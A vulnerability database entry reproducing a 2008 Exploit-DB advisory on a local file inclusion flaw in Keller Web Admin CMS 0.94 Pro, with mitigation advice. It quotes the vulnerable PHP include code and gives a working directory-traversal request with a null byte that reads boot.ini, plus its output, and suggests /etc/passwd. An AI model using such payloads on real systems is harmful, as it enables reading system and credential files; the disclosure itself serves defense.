Keller Web Admin CMS Local File Inclusion Vulnerability

vendor:

Keller Web Admin CMS

by:

CWH Underground

6.5

CVSS

MEDIUM

Local File Inclusion

CWE

Product Name: Keller Web Admin CMS

Affected Version From: 0.94 Pro

Affected Version To: 0.94 Pro

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2008

Keller Web Admin CMS Local File Inclusion Vulnerability

This vulnerability allows an attacker to include local files from the target system by manipulating the 'action' parameter in the index.php file. By using directory traversal techniques, an attacker can access sensitive files on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and validate the 'action' parameter before including files in the code. Additionally, limiting access to sensitive files and directories can also help prevent exploitation.

Source

Exploit-DB raw data:

===========================================================
  Keller Web Admin CMS Local File Inclusion Vulnerability
===========================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 26 June 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : Keller Web Admin CMS
 VERSION     : 0.94 Pro
 VENDOR      : N/A
 DOWNLOAD    : http://downloads.sourceforge.net/kwa
#####################################################

--- Local File Inclusion ---

-------------------------------------
 Vulnerable File [/Public/index.php]
-------------------------------------

@Line 

   21:  if (isset($_GET['action'])) {
   22:  $action=$_GET['action'];
   23:	$inclConfig = $includeFolder.$action.".inc.php";
   24:	include($inclConfig);
   25:	header('Location: '.$clnt_referer);
   26:	die();
   27:  }

---------
 Exploit
---------

[+] http://[Target]/[kwa_path]/Public/index.php?action=[LFI]

-------------
 POC Exploit
-------------

[+] http://192.168.24.25/kwa/Public/index.php?action=../../../../../../../../boot.ini%00

    This exploit will open boot.ini in system file:

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

    You can change boot.ini to /etc/passwd%00 in linux OS.


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-26]